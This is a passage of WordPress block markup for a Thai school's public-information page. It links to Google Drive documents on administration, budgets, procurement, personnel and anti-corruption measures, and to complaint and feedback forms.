{\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br>   <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br>      <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br>       <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br>     <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม  No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} 